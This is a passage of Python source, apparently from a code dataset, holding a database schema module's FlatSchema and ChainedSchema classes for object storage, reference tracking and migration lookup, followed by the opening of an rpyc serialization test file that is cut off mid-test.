ids = frozenset()
shortname_to_id = shortname_to_id.set(sn_key, ids | {obj_id})
return name_to_id, shortname_to_id, globalname_to_id
def update_obj(
self,
obj: so.Object,
updates: Mapping[str, Any],
) -> FlatSchema:
if not updates:
return self
obj_id = obj.id
sclass = type(obj)
all_fields = sclass.get_schema_fields()
object_ref_fields = sclass.get_object_reference_fields()
reducible_fields = sclass.get_reducible_fields()
try:
data = list(self._id_to_data[obj_id])
except KeyError:
data = [None] * len(all_fields)
name_to_id = None
shortname_to_id = None
globalname_to_id = None
orig_refs = {}
new_refs = {}
for fieldname, value in updates.items():
field = all_fields[fieldname]
findex = field.index
if fieldname == 'name':
name_to_id, shortname_to_id, globalname_to_id = (
self._update_obj_name(
obj_id,
sclass,
data[findex],
value
)
)
if value is None:
if field in reducible_fields and field in object_ref_fields:
orig_value = data[findex]
if orig_value is not None:
orig_refs[fieldname] = (
field.type.schema_refs_from_data(orig_value))
else:
if field in reducible_fields:
value = value.schema_reduce()
if field in object_ref_fields:
new_refs[fieldname] = (
field.type.schema_refs_from_data(value))
orig_value = data[findex]
if orig_value is not None:
orig_refs[fieldname] = (
field.type.schema_refs_from_data(orig_value))
data[findex] = value
id_to_data = self._id_to_data.set(obj_id, tuple(data))
refs_to = self._update_refs_to(obj_id, sclass, orig_refs, new_refs)
return self._replace(name_to_id=name_to_id,
shortname_to_id=shortname_to_id,
globalname_to_id=globalname_to_id,
id_to_data=id_to_data,
refs_to=refs_to)
def maybe_get_obj_data_raw(
self,
obj: so.Object,
) -> Optional[Tuple[Any, ...]]:
return self._id_to_data.get(obj.id)
def get_obj_data_raw(
self,
obj: so.Object,
) -> Tuple[Any, ...]:
try:
return self._id_to_data[obj.id]
except KeyError:
err = (f'cannot get item data: item {str(obj.id)!r} '
f'is not present in the schema {self!r}')
raise errors.SchemaError(err) from None
def set_obj_field(
self,
obj: so.Object,
fieldname: str,
value: Any,
) -> FlatSchema:
obj_id = obj.id
try:
data = self._id_to_data[obj_id]
except KeyError:
err = (f'cannot set {fieldname!r} value: item {str(obj_id)!r} '
f'is not present in the schema {self!r}')
raise errors.SchemaError(err) from None
sclass = so.ObjectMeta.get_schema_class(self._id_to_type[obj_id])
field = sclass.get_schema_field(fieldname)
findex = field.index
is_object_ref = field in sclass.get_object_reference_fields()
if field in sclass.get_reducible_fields():
value = value.schema_reduce()
name_to_id = None
shortname_to_id = None
globalname_to_id = None
if fieldname == 'name':
old_name = data[findex]
name_to_id, shortname_to_id, globalname_to_id = (
self._update_obj_name(obj_id, sclass, old_name, value)
)
data_list = list(data)
data_list[findex] = value
new_data = tuple(data_list)
id_to_data = self._id_to_data.set(obj_id, new_data)
if not is_object_ref:
refs_to = None
else:
orig_value = data[findex]
if orig_value is not None:
orig_refs = {
fieldname: field.type.schema_refs_from_data(orig_value),
}
else:
orig_refs = {}
new_refs = {fieldname: field.type.schema_refs_from_data(value)}
refs_to = self._update_refs_to(obj_id, sclass, orig_refs, new_refs)
return self._replace(
name_to_id=name_to_id,
shortname_to_id=shortname_to_id,
globalname_to_id=globalname_to_id,
id_to_data=id_to_data,
refs_to=refs_to,
)
def unset_obj_field(
self,
obj: so.Object,
fieldname: str,
) -> FlatSchema:
obj_id = obj.id
try:
data = self._id_to_data[obj.id]
except KeyError:
return self
sclass = so.ObjectMeta.get_schema_class(self._id_to_type[obj.id])
field = sclass.get_schema_field(fieldname)
findex = field.index
name_to_id = None
shortname_to_id = None
globalname_to_id = None
orig_value = data[findex]
if orig_value is None:
return self
if fieldname == 'name':
name_to_id, shortname_to_id, globalname_to_id = (
self._update_obj_name(
obj_id,
sclass,
orig_value,
None
)
)
data_list = list(data)
data_list[findex] = None
new_data = tuple(data_list)
id_to_data = self._id_to_data.set(obj_id, new_data)
is_object_ref = field in sclass.get_object_reference_fields()
if not is_object_ref:
refs_to = None
else:
orig_refs = {
fieldname: field.type.schema_refs_from_data(orig_value),
}
refs_to = self._update_refs_to(obj_id, sclass, orig_refs, None)
return self._replace(
name_to_id=name_to_id,
shortname_to_id=shortname_to_id,
globalname_to_id=globalname_to_id,
id_to_data=id_to_data,
refs_to=refs_to,
)
def _update_refs_to(
self,
object_id: uuid.UUID,
sclass: Type[so.Object],
orig_refs: Optional[Mapping[str, FrozenSet[uuid.UUID]]],
new_refs: Optional[Mapping[str, FrozenSet[uuid.UUID]]],
) -> Refs_T:
objfields = sclass.get_object_reference_fields()
if not objfields:
return self._refs_to
with self._refs_to.mutate() as mm:
for field in objfields:
if not new_refs:
ids = None
else:
ids = new_refs.get(field.name)
if not orig_refs:
orig_ids = None
else:
orig_ids = orig_refs.get(field.name)
if not ids and not orig_ids:
continue
old_ids: Optional[FrozenSet[uuid.UUID]]
new_ids: Optional[FrozenSet[uuid.UUID]]
key = (sclass, field.name)
if ids and orig_ids:
new_ids = ids - orig_ids
old_ids = orig_ids - ids
elif ids:
new_ids = ids
old_ids = None
else:
new_ids = None
old_ids = orig_ids
if new_ids:
for ref_id in new_ids:
try:
refs = mm[ref_id]
except KeyError:
mm[ref_id] = immu.Map((
(key, immu.Map(((object_id, None),))),
))
else:
try:
field_refs = refs[key]
except KeyError:
field_refs = immu.Map(((object_id, None),))
else:
field_refs = field_refs.set(object_id, None)
mm[ref_id] = refs.set(key, field_refs)
if old_ids:
for ref_id in old_ids:
refs = mm[ref_id]
field_refs = refs[key].delete(object_id)
if not field_refs:
mm[ref_id] = refs.delete(key)
else:
mm[ref_id] = refs.set(key, field_refs)
result = mm.finish()
return result
def add_raw(
self,
id: uuid.UUID,
sclass: Type[so.Object],
data: Tuple[Any, ...],
) -> FlatSchema:
name_field = sclass.get_schema_field('name')
name = data[name_field.index]
if name in self._name_to_id:
other_obj = self.get_by_id(
self._name_to_id[name], type=so.Object)
vn = other_obj.get_verbosename(self, with_parent=True)
raise errors.SchemaError(f'{vn} already exists')
if id in self._id_to_data:
raise errors.SchemaError(
f'{sclass.__name__} ({str(id)!r}) is already present '
f'in the schema {self!r}')
object_ref_fields = sclass.get_object_reference_fields()
if not object_ref_fields:
refs_to = None
else:
new_refs = {}
for field in object_ref_fields:
ref = data[field.index]
if ref is not None:
ref = field.type.schema_refs_from_data(ref)
new_refs[field.name] = ref
refs_to = self._update_refs_to(id, sclass, None, new_refs)
name_to_id, shortname_to_id, globalname_to_id = self._update_obj_name(
id, sclass, None, name)
updates = dict(
id_to_data=self._id_to_data.set(id, data),
id_to_type=self._id_to_type.set(id, sclass.__name__),
name_to_id=name_to_id,
shortname_to_id=shortname_to_id,
globalname_to_id=globalname_to_id,
refs_to=refs_to,
)
if (
issubclass(sclass, so.QualifiedObject)
and not self.has_module(name.module)
and name.module != '__derived__'
):
raise errors.UnknownModuleError(
f'module {name.module!r} is not in this schema')
return self._replace(**updates) # type: ignore
def add(
self,
id: uuid.UUID,
sclass: Type[so.Object],
data: Tuple[Any, ...],
) -> FlatSchema:
reducible_fields = sclass.get_reducible_fields()
if reducible_fields:
data_list = list(data)
for field in reducible_fields:
val = data[field.index]
if val is not None:
data_list[field.index] = val.schema_reduce()
data = tuple(data_list)
return self.add_raw(id, sclass, data)
def _delete(self, obj: so.Object) -> FlatSchema:
data = self._id_to_data.get(obj.id)
if data is None:
raise errors.InvalidReferenceError(
f'cannot delete {obj!r}: not in this schema')
sclass = type(obj)
name_field = sclass.get_schema_field('name')
name = data[name_field.index]
updates = {}
name_to_id, shortname_to_id, globalname_to_id = self._update_obj_name(
obj.id, sclass, name, None)
object_ref_fields = sclass.get_object_reference_fields()
if not object_ref_fields:
refs_to = None
else:
values = self._id_to_data[obj.id]
orig_refs = {}
for field in object_ref_fields:
ref = values[field.index]
if ref is not None:
ref = field.type.schema_refs_from_data(ref)
orig_refs[field.name] = ref
refs_to = self._update_refs_to(obj.id, sclass, orig_refs, None)
updates.update(dict(
name_to_id=name_to_id,
shortname_to_id=shortname_to_id,
globalname_to_id=globalname_to_id,
id_to_data=self._id_to_data.delete(obj.id),
id_to_type=self._id_to_type.delete(obj.id),
refs_to=refs_to,
))
return self._replace(**updates) # type: ignore
def discard(self, obj: so.Object) -> FlatSchema:
if obj.id in self._id_to_data:
return self._delete(obj)
else:
return self
def delete(self, obj: so.Object) -> FlatSchema:
return self._delete(obj)
def _search_with_getter(
self,
name: Union[str, sn.Name],
*,
getter: Callable[[FlatSchema, sn.Name], Any],
default: Any,
module_aliases: Optional[Mapping[Optional[str], str]],
) -> Any:
if isinstance(name, str):
name = sn.name_from_string(name)
shortname = name.name
module = name.module if isinstance(name, sn.QualName) else None
implicit_builtins = module is None
if module == '__std__':
fqname = sn.QualName('std', shortname)
result = getter(self, fqname)
if result is not None:
return result
else:
return default
if module_aliases is not None:
fq_module = module_aliases.get(module)
if fq_module is not None:
module = fq_module
if module is not None:
fqname = sn.QualName(module, shortname)
result = getter(self, fqname)
if result is not None:
return result
if implicit_builtins:
fqname = sn.QualName('std', shortname)
result = getter(self, fqname)
if result is not None:
return result
return default
def get_functions(
self,
name: Union[str, sn.Name],
default: Union[
Tuple[s_func.Function, ...], so.NoDefaultT
] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
) -> Tuple[s_func.Function, ...]:
if isinstance(name, str):
name = sn.name_from_string(name)
funcs = self._search_with_getter(
name,
getter=_get_functions,
module_aliases=module_aliases,
default=default,
)
if funcs is not so.NoDefault:
return cast(
Tuple[s_func.Function, ...],
funcs,
)
else:
return self._raise_bad_reference(
name=name,
module_aliases=module_aliases,
type=s_func.Function,
)
def get_operators(
self,
name: Union[str, sn.Name],
default: Union[
Tuple[s_oper.Operator, ...], so.NoDefaultT
] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
) -> Tuple[s_oper.Operator, ...]:
funcs = self._search_with_getter(
name,
getter=_get_operators,
module_aliases=module_aliases,
default=default,
)
if funcs is not so.NoDefault:
return cast(
Tuple[s_oper.Operator, ...],
funcs,
)
else:
return self._raise_bad_reference(
name=name,
module_aliases=module_aliases,
type=s_oper.Operator,
)
@functools.lru_cache()
def _get_casts(
self,
stype: s_types.Type,
*,
disposition: str,
implicit: bool = False,
assignment: bool = False,
) -> FrozenSet[s_casts.Cast]:
all_casts = cast(
FrozenSet[s_casts.Cast],
self.get_referrers(
stype, scls_type=s_casts.Cast, field_name=disposition),
)
casts = []
for castobj in all_casts:
if implicit and not castobj.get_allow_implicit(self):
continue
if assignment and not castobj.get_allow_assignment(self):
continue
casts.append(castobj)
return frozenset(casts)
def get_casts_to_type(
self,
to_type: s_types.Type,
*,
implicit: bool = False,
assignment: bool = False,
) -> FrozenSet[s_casts.Cast]:
return self._get_casts(to_type, disposition='to_type',
implicit=implicit, assignment=assignment)
def get_casts_from_type(
self,
from_type: s_types.Type,
*,
implicit: bool = False,
assignment: bool = False,
) -> FrozenSet[s_casts.Cast]:
return self._get_casts(from_type, disposition='from_type',
implicit=implicit, assignment=assignment)
def get_referrers(
self,
scls: so.Object,
*,
scls_type: Optional[Type[so.Object_T]] = None,
field_name: Optional[str] = None,
) -> FrozenSet[so.Object_T]:
return self._get_referrers(
scls, scls_type=scls_type, field_name=field_name)
@functools.lru_cache()
def _get_referrers(
self,
scls: so.Object,
*,
scls_type: Optional[Type[so.Object_T]] = None,
field_name: Optional[str] = None,
) -> FrozenSet[so.Object_T]:
try:
refs = self._refs_to[scls.id]
except KeyError:
return frozenset()
else:
referrers: Set[so.Object] = set()
if scls_type is not None:
if field_name is not None:
for (st, fn), ids in refs.items():
if issubclass(st, scls_type) and fn == field_name:
referrers.update(
self.get_by_id(objid) for objid in ids)
else:
for (st, _), ids in refs.items():
if issubclass(st, scls_type):
referrers.update(
self.get_by_id(objid) for objid in ids)
elif field_name is not None:
for (_, fn), ids in refs.items():
if fn == field_name:
referrers.update(
self.get_by_id(objid) for objid in ids)
else:
refids = itertools.chain.from_iterable(refs.values())
referrers.update(self.get_by_id(objid) for objid in refids)
return frozenset(referrers) # type: ignore
@functools.lru_cache()
def get_referrers_ex(
self,
scls: so.Object,
*,
scls_type: Optional[Type[so.Object_T]] = None,
) -> Dict[
Tuple[Type[so.Object_T], str],
FrozenSet[so.Object_T],
]:
try:
refs = self._refs_to[scls.id]
except KeyError:
return {}
else:
result = {}
if scls_type is not None:
for (st, fn), ids in refs.items():
if issubclass(st, scls_type):
result[st, fn] = frozenset(
self.get_by_id(objid) for objid in ids)
else:
for (st, fn), ids in refs.items():
result[st, fn] = frozenset( # type: ignore
self.get_by_id(objid) for objid in ids)
return result # type: ignore
def _get_by_id( # NoQA: F811
self,
obj_id: uuid.UUID,
default: Union[so.Object_T, so.NoDefaultT, None],
*,
type: Optional[Type[so.Object_T]],
) -> Optional[so.Object_T]:
try:
sclass_name = self._id_to_type[obj_id]
except KeyError:
if default is so.NoDefault:
raise errors.InvalidReferenceError(
f'reference to a non-existent schema item {obj_id}'
f' in schema {self!r}'
) from None
else:
return default
else:
obj = so.Object.schema_restore((sclass_name, obj_id))
if type is not None and not isinstance(obj, type):
raise errors.InvalidReferenceError(
f'schema object {obj_id!r} exists, but is a '
f'{obj.__class__.get_schema_class_displayname()!r}, '
f'not a {type.get_schema_class_displayname()!r}'
)
# Avoid the overhead of cast(Object_T) below
return obj # type: ignore
def _get_global(
self,
objtype: Type[so.Object_T],
name: Union[str, sn.Name],
default: Union[so.Object_T, so.NoDefaultT, None],
) -> Optional[so.Object_T]:
if isinstance(name, str):
name = sn.UnqualName(name)
obj_id = self._globalname_to_id.get((objtype, name))
if obj_id is not None:
return self.get_by_id(obj_id) # type: ignore
elif default is not so.NoDefault:
return default
else:
self._raise_bad_reference(name, type=objtype)
def _get(
self,
name: Union[str, sn.Name],
default: Union[so.Object, so.NoDefaultT, None],
*,
module_aliases: Optional[Mapping[Optional[str], str]],
type: Optional[Type[so.Object_T]],
condition: Optional[Callable[[so.Object], bool]],
label: Optional[str],
sourcectx: Optional[parsing.ParserContext],
) -> Optional[so.Object]:
def getter(schema: FlatSchema, name: sn.Name) -> Optional[so.Object]:
obj_id = schema._name_to_id.get(name)
if obj_id is None:
return None
obj = schema.get_by_id(obj_id, default=None)
if obj is not None and condition is not None:
if not condition(obj):
obj = None
return obj
obj = self._search_with_getter(
name,
getter=getter,
module_aliases=module_aliases,
default=default,
)
if obj is not so.NoDefault:
# We do our own type check, instead of using get_by_id's, so
# we can produce a user-facing error message.
if obj and type is not None and not isinstance(obj, type):
refname = str(name)
got_name = obj.__class__.get_schema_class_displayname()
exp_name = type.get_schema_class_displayname()
raise errors.InvalidReferenceError(
f'{refname!r} exists, but is {english.add_a(got_name)}, '
f'not {english.add_a(exp_name)}',
context=sourcectx,
)
return obj # type: ignore
else:
self._raise_bad_reference(
name=name,
label=label,
module_aliases=module_aliases,
sourcectx=sourcectx,
type=type,
)
def _raise_bad_reference(
self,
name: Union[str, sn.Name],
*,
label: Optional[str] = None,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
sourcectx: Optional[parsing.ParserContext] = None,
type: Optional[Type[so.Object]] = None,
) -> NoReturn:
refname = str(name)
if label is None:
if type is not None:
label = type.get_schema_class_displayname()
else:
label = 'schema item'
if type is not None:
if issubclass(type, so.QualifiedObject):
if not sn.is_qualified(refname):
if module_aliases is not None:
default_module = module_aliases.get(None)
if default_module is not None:
refname = type.get_displayname_static(
sn.QualName(default_module, refname),
)
else:
refname = type.get_displayname_static(
sn.QualName.from_string(refname))
else:
refname = type.get_displayname_static(
sn.UnqualName.from_string(refname))
raise errors.InvalidReferenceError(
f'{label} {refname!r} does not exist',
context=sourcectx,
)
def has_object(self, object_id: uuid.UUID) -> bool:
return object_id in self._id_to_type
def has_module(self, module: str) -> bool:
return self.get_global(s_mod.Module, module, None) is not None
def get_objects(
self,
*,
exclude_stdlib: bool = False,
exclude_global: bool = False,
exclude_internal: bool = True,
included_modules: Optional[Iterable[sn.Name]] = None,
excluded_modules: Optional[Iterable[sn.Name]] = None,
included_items: Optional[Iterable[sn.Name]] = None,
excluded_items: Optional[Iterable[sn.Name]] = None,
type: Optional[Type[so.Object_T]] = None,
extra_filters: Iterable[Callable[[Schema, so.Object], bool]] = (),
) -> SchemaIterator[so.Object_T]:
return SchemaIterator[so.Object_T](
self,
self._id_to_type,
exclude_stdlib=exclude_stdlib,
exclude_global=exclude_global,
exclude_internal=exclude_internal,
included_modules=included_modules,
excluded_modules=excluded_modules,
included_items=included_items,
excluded_items=excluded_items,
type=type,
extra_filters=extra_filters,
)
def get_modules(self) -> Tuple[s_mod.Module, ...]:
modules = []
for (objtype, _), objid in self._globalname_to_id.items():
if objtype is s_mod.Module:
modules.append(self.get_by_id(objid, type=s_mod.Module))
return tuple(modules)
def get_last_migration(self) -> Optional[s_migrations.Migration]:
return _get_last_migration(self)
def __repr__(self) -> str:
return (
f'<{type(self).__name__} gen:{self._generation} at {id(self):#x}>')
class SchemaIterator(Generic[so.Object_T]):
def __init__(
self,
schema: Schema,
object_ids: Iterable[uuid.UUID],
*,
exclude_stdlib: bool = False,
exclude_global: bool = False,
exclude_internal: bool = True,
included_modules: Optional[Iterable[sn.Name]],
excluded_modules: Optional[Iterable[sn.Name]],
included_items: Optional[Iterable[sn.Name]] = None,
excluded_items: Optional[Iterable[sn.Name]] = None,
type: Optional[Type[so.Object_T]] = None,
extra_filters: Iterable[Callable[[Schema, so.Object], bool]] = (),
) -> None:
filters = []
if type is not None:
t = type
filters.append(lambda schema, obj: isinstance(obj, t))
if included_modules:
modules = frozenset(included_modules)
filters.append(
lambda schema, obj:
isinstance(obj, so.QualifiedObject) and
obj.get_name(schema).get_module_name() in modules)
if excluded_modules or exclude_stdlib:
excmod: Set[sn.Name] = set()
if excluded_modules:
excmod.update(excluded_modules)
if exclude_stdlib:
excmod.update(STD_MODULES)
filters.append(
lambda schema, obj: (
not isinstance(obj, so.QualifiedObject)
or obj.get_name(schema).get_module_name() not in excmod
)
)
if included_items:
objs = frozenset(included_items)
filters.append(
lambda schema, obj: obj.get_name(schema) in objs)
if excluded_items:
objs = frozenset(excluded_items)
filters.append(
lambda schema, obj: obj.get_name(schema) not in objs)
if exclude_stdlib:
filters.append(
lambda schema, obj: not isinstance(obj, s_pseudo.PseudoType)
)
if exclude_global:
filters.append(
lambda schema, obj: not isinstance(obj, so.GlobalObject)
)
if exclude_internal:
filters.append(
lambda schema, obj: not isinstance(obj, so.InternalObject)
)
# Extra filters are last, because they might depend on type.
filters.extend(extra_filters)
self._filters = filters
self._schema = schema
self._object_ids = object_ids
def __iter__(self) -> Iterator[so.Object_T]:
filters = self._filters
schema = self._schema
get_by_id = schema.get_by_id
for obj_id in self._object_ids:
obj = get_by_id(obj_id)
if all(f(self._schema, obj) for f in filters):
yield obj # type: ignore
class ChainedSchema(Schema):
__slots__ = ('_base_schema', '_top_schema', '_global_schema')
def __init__(
self,
base_schema: FlatSchema,
top_schema: FlatSchema,
global_schema: FlatSchema
) -> None:
self._base_schema = base_schema
self._top_schema = top_schema
self._global_schema = global_schema
def get_top_schema(self) -> FlatSchema:
return self._top_schema
def get_global_schema(self) -> FlatSchema:
return self._global_schema
def add_raw(
self,
id: uuid.UUID,
sclass: Type[so.Object],
data: Tuple[Any, ...],
) -> ChainedSchema:
if issubclass(sclass, so.GlobalObject):
return ChainedSchema(
self._base_schema,
self._top_schema,
self._global_schema.add_raw(id, sclass, data),
)
else:
return ChainedSchema(
self._base_schema,
self._top_schema.add_raw(id, sclass, data),
self._global_schema,
)
def add(
self,
id: uuid.UUID,
sclass: Type[so.Object],
data: Tuple[Any, ...],
) -> ChainedSchema:
if issubclass(sclass, so.GlobalObject):
return ChainedSchema(
self._base_schema,
self._top_schema,
self._global_schema.add(id, sclass, data),
)
else:
return ChainedSchema(
self._base_schema,
self._top_schema.add(id, sclass, data),
self._global_schema,
)
def discard(self, obj: so.Object) -> ChainedSchema:
if isinstance(obj, so.GlobalObject):
return ChainedSchema(
self._base_schema,
self._top_schema,
self._global_schema.discard(obj),
)
else:
return ChainedSchema(
self._base_schema,
self._top_schema.discard(obj),
self._global_schema,
)
def delete(self, obj: so.Object) -> ChainedSchema:
if isinstance(obj, so.GlobalObject):
return ChainedSchema(
self._base_schema,
self._top_schema,
self._global_schema.delete(obj),
)
else:
return ChainedSchema(
self._base_schema,
self._top_schema.delete(obj),
self._global_schema,
)
def update_obj(
self,
obj: so.Object,
updates: Mapping[str, Any],
) -> ChainedSchema:
if isinstance(obj, so.GlobalObject):
return ChainedSchema(
self._base_schema,
self._top_schema,
self._global_schema.update_obj(obj, updates),
)
else:
obj_id = obj.id
base_obj = self._base_schema.get_by_id(obj_id, default=None)
if (
base_obj is not None
and not self._top_schema.has_object(obj_id)
):
top_schema = self._top_schema.add_raw(
obj_id,
type(base_obj),
self._base_schema._id_to_data[obj_id],
)
else:
top_schema = self._top_schema
return ChainedSchema(
self._base_schema,
top_schema.update_obj(obj, updates),
self._global_schema,
)
def maybe_get_obj_data_raw(
self,
obj: so.Object,
) -> Optional[Tuple[Any, ...]]:
if isinstance(obj, so.GlobalObject):
return self._global_schema.maybe_get_obj_data_raw(obj)
else:
top = self._top_schema.maybe_get_obj_data_raw(obj)
if top is not None:
return top
else:
return self._base_schema.maybe_get_obj_data_raw(obj)
def get_obj_data_raw(
self,
obj: so.Object,
) -> Tuple[Any, ...]:
if isinstance(obj, so.GlobalObject):
return self._global_schema.get_obj_data_raw(obj)
else:
top = self._top_schema.maybe_get_obj_data_raw(obj)
if top is not None:
return top
else:
return self._base_schema.get_obj_data_raw(obj)
def set_obj_field(
self,
obj: so.Object,
fieldname: str,
value: Any,
) -> ChainedSchema:
if isinstance(obj, so.GlobalObject):
return ChainedSchema(
self._base_schema,
self._top_schema,
self._global_schema.set_obj_field(obj, fieldname, value),
)
else:
return ChainedSchema(
self._base_schema,
self._top_schema.set_obj_field(obj, fieldname, value),
self._global_schema,
)
def unset_obj_field(
self,
obj: so.Object,
field: str,
) -> ChainedSchema:
if isinstance(obj, so.GlobalObject):
return ChainedSchema(
self._base_schema,
self._top_schema,
self._global_schema.unset_obj_field(obj, field),
)
else:
return ChainedSchema(
self._base_schema,
self._top_schema.unset_obj_field(obj, field),
self._global_schema,
)
def get_functions(
self,
name: Union[str, sn.Name],
default: Union[
Tuple[s_func.Function, ...], so.NoDefaultT
] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
) -> Tuple[s_func.Function, ...]:
objs = self._top_schema.get_functions(
name, module_aliases=module_aliases, default=())
if not objs:
objs = self._base_schema.get_functions(
name, default=default, module_aliases=module_aliases)
return objs
def get_operators(
self,
name: Union[str, sn.Name],
default: Union[
Tuple[s_oper.Operator, ...], so.NoDefaultT
] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
) -> Tuple[s_oper.Operator, ...]:
objs = self._top_schema.get_operators(
name, module_aliases=module_aliases, default=())
if not objs:
objs = self._base_schema.get_operators(
name, default=default, module_aliases=module_aliases)
return objs
def get_casts_to_type(
self,
to_type: s_types.Type,
*,
implicit: bool = False,
assignment: bool = False,
) -> FrozenSet[s_casts.Cast]:
return (
self._base_schema.get_casts_to_type(
to_type,
implicit=implicit,
assignment=assignment,
)
| self._top_schema.get_casts_to_type(
to_type,
implicit=implicit,
assignment=assignment,
)
)
def get_casts_from_type(
self,
from_type: s_types.Type,
*,
implicit: bool = False,
assignment: bool = False,
) -> FrozenSet[s_casts.Cast]:
return (
self._base_schema.get_casts_from_type(
from_type,
implicit=implicit,
assignment=assignment,
)
| self._top_schema.get_casts_from_type(
from_type,
implicit=implicit,
assignment=assignment,
)
)
def get_referrers(
self,
scls: so.Object,
*,
scls_type: Optional[Type[so.Object_T]] = None,
field_name: Optional[str] = None,
) -> FrozenSet[so.Object_T]:
return (
self._base_schema.get_referrers(
scls,
scls_type=scls_type,
field_name=field_name,
)
| self._top_schema.get_referrers(
scls,
scls_type=scls_type,
field_name=field_name,
)
| self._global_schema.get_referrers(
scls,
scls_type=scls_type,
field_name=field_name,
)
)
def get_referrers_ex(
self,
scls: so.Object,
*,
scls_type: Optional[Type[so.Object_T]] = None,
) -> Dict[
Tuple[Type[so.Object_T], str],
FrozenSet[so.Object_T],
]:
base = self._base_schema.get_referrers_ex(scls, scls_type=scls_type)
top = self._top_schema.get_referrers_ex(scls, scls_type=scls_type)
gl = self._global_schema.get_referrers_ex(scls, scls_type=scls_type)
return {
k: (
base.get(k, frozenset())
| top.get(k, frozenset())
| gl.get(k, frozenset())
)
for k in itertools.chain(base, top)
}
def _get_by_id(
self,
obj_id: uuid.UUID,
default: Union[so.Object_T, so.NoDefaultT, None],
*,
type: Optional[Type[so.Object_T]],
) -> Optional[so.Object_T]:
obj = self._top_schema.get_by_id(obj_id, type=type, default=None)
if obj is None:
obj = self._base_schema.get_by_id(
obj_id, default=None, type=type)
if obj is None:
obj = self._global_schema.get_by_id(
obj_id, default=default, type=type)
return obj
def _get_global(
self,
objtype: Type[so.Object_T],
name: Union[str, sn.Name],
default: Union[so.Object_T, so.NoDefaultT, None],
) -> Optional[so.Object_T]:
if issubclass(objtype, so.GlobalObject):
return self._global_schema.get_global( # type: ignore
objtype, name, default=default)
else:
obj = self._top_schema.get_global(objtype, name, default=None)
if obj is None:
obj = self._base_schema.get_global(
objtype, name, default=default)
return obj
def _get(
self,
name: Union[str, sn.Name],
default: Union[so.Object, so.NoDefaultT, None],
*,
module_aliases: Optional[Mapping[Optional[str], str]],
type: Optional[Type[so.Object_T]],
condition: Optional[Callable[[so.Object], bool]],
label: Optional[str],
sourcectx: Optional[parsing.ParserContext],
) -> Optional[so.Object]:
obj = self._top_schema.get(
name,
module_aliases=module_aliases,
type=type,
default=None,
condition=condition,
label=label,
sourcectx=sourcectx,
)
if obj is None:
return self._base_schema.get(
name,
default=default,
module_aliases=module_aliases,
type=type,
condition=condition,
label=label,
sourcectx=sourcectx,
)
else:
return obj
def has_object(self, object_id: uuid.UUID) -> bool:
return (
self._base_schema.has_object(object_id)
or self._top_schema.has_object(object_id)
or self._global_schema.has_object(object_id)
)
def has_module(self, module: str) -> bool:
return (
self._base_schema.has_module(module)
or self._top_schema.has_module(module)
)
def get_objects(
self,
*,
exclude_stdlib: bool = False,
exclude_global: bool = False,
exclude_internal: bool = True,
included_modules: Optional[Iterable[sn.Name]] = None,
excluded_modules: Optional[Iterable[sn.Name]] = None,
included_items: Optional[Iterable[sn.Name]] = None,
excluded_items: Optional[Iterable[sn.Name]] = None,
type: Optional[Type[so.Object_T]] = None,
extra_filters: Iterable[Callable[[Schema, so.Object], bool]] = (),
) -> SchemaIterator[so.Object_T]:
return SchemaIterator[so.Object_T](
self,
itertools.chain(
self._base_schema._id_to_type,
self._top_schema._id_to_type,
self._global_schema._id_to_type,
),
exclude_global=exclude_global,
exclude_stdlib=exclude_stdlib,
exclude_internal=exclude_internal,
included_modules=included_modules,
excluded_modules=excluded_modules,
included_items=included_items,
excluded_items=excluded_items,
type=type,
extra_filters=extra_filters,
)
def get_modules(self) -> Tuple[s_mod.Module, ...]:
return (
self._base_schema.get_modules()
+ self._top_schema.get_modules()
)
def get_last_migration(self) -> Optional[s_migrations.Migration]:
migration = self._top_schema.get_last_migration()
if migration is None:
migration = self._base_schema.get_last_migration()
return migration
@functools.lru_cache()
def _get_functions(
schema: FlatSchema,
name: sn.Name,
) -> Optional[Tuple[s_func.Function, ...]]:
objids = schema._shortname_to_id.get((s_func.Function, name))
if objids is None:
return None
return cast(
Tuple[s_func.Function, ...],
tuple(schema.get_by_id(oid) for oid in objids),
)
@functools.lru_cache()
def _get_operators(
schema: FlatSchema,
name: sn.Name,
) -> Optional[Tuple[s_oper.Operator, ...]]:
objids = schema._shortname_to_id.get((s_oper.Operator, name))
if objids is None:
return None
else:
return tuple(
schema.get_by_id(oid, type=s_oper.Operator) for oid in objids
)
@functools.lru_cache()
def _get_last_migration(
schema: FlatSchema,
) -> Optional[s_migrations.Migration]:
migrations = cast(
List[s_migrations.Migration],
[
schema.get_by_id(mid)
for (t, _), mid in schema._globalname_to_id.items()
if t is s_migrations.Migration
],
)
if not migrations:
return None
migration_map = collections.defaultdict(list)
root = None
for m in migrations:
parents = m.get_parents(schema).objects(schema)
if not parents:
if root is not None:
raise errors.InternalServerError(
'multiple migration roots found')
root = m
for parent in parents:
migration_map[parent].append(m)
if root is None:
raise errors.InternalServerError('cannot find migration root')
latest = root
while children := migration_map[latest]:
if len(children) > 1:
raise errors.InternalServerError(
'nonlinear migration history detected')
latest = children[0]
return latest
| 31.513297 | 79 | 0.548037 |
acfb624b375782818ff5c331dc9d4d1183e8c4e5 | 744 | py | Python | tests/test_brine.py | pdxjohnny/rpyc | bc8f0223be8436fa77c71cda94cc6610d621a364 | [
"MIT"
] | 238 | 2020-09-02T22:26:44.000Z | 2022-03-31T17:49:55.000Z | tests/test_brine.py | pdxjohnny/rpyc | bc8f0223be8436fa77c71cda94cc6610d621a364 | [
"MIT"
] | 87 | 2020-09-02T20:10:35.000Z | 2022-03-16T16:49:47.000Z | tests/test_brine.py | pdxjohnny/rpyc | bc8f0223be8436fa77c71cda94cc6610d621a364 | [
"MIT"
] | 40 | 2020-09-13T19:53:51.000Z | 2022-03-21T09:17:48.000Z | from rpyc.core import brine
from rpyc.lib.compat import is_py_3k
import unittest
class BrineTest(unittest.TestCase):
def test_brine_2(self):
if is_py_3k:
exec('''x = (b"he", 7, "llo", 8, (), 900, None, True, Ellipsis, 18.2, 18.2j + 13,
slice(1, 2, 3), frozenset([5, 6, 7]), NotImplemented, (1,2))''', globals())
else:
exec('''x = ("he", 7, u"llo", 8, (), 900, None, True, Ellipsis, 18.2, 18.2j + 13,
slice(1, 2, 3), frozenset([5, 6, 7]), NotImplemented, (1,2))''')
